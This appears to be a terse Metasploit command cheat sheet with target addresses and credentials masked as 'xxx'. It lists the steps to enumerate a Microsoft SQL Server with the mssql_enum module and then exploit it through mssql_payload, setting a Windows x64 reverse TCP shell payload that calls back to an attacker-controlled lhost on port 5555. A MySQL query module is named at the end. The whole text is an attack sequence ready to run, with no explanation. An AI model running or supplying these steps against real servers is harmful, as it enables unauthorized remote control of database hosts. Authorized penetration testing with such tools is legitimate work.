msf5 auxiliary(scanner/mssql/mssql_login) > use auxiliary/admin/mssql/mssql_enum
msf5 auxiliary(admin/mssql/mssql_enum) > set rhosts xxx.xxx.xxx.xxx
msf5 auxiliary(admin/mssql/mssql_enum) > set username xxx
msf5 auxiliary(admin/mssql/mssql_enum) > set password xxx
msf5 auxiliary(admin/mssql/mssql_enum) > run
##################################################################
msf5 auxiliary(admin/mssql/mssql_enum) > use exploit/windows/mssql/mssql_payload
msf5 exploit(windows/mssql/mssql_payload) > set rhosts xxx.xxx.xxx.xxx
msf5 exploit(windows/mssql/mssql_payload) > set username xxx
msf5 exploit(windows/mssql/mssql_payload) > set password xxx
msf5 exploit(windows/mssql/mssql_payload) > set SRVPORT 53
msf5 exploit(windows/mssql/mssql_payload) > set payload windows/x64/shell_reverse_tcp
msf5 exploit(windows/mssql/mssql_payload) > set lhost xxx.xxx.xxx.xxx
msf5 exploit(windows/mssql/mssql_payload) > set lport 5555
msf5 exploit(windows/mssql/mssql_payload) > exploit
#####################################################################
msf5 auxiliary(admin/mysql/mysql_sql)
#####################################################################
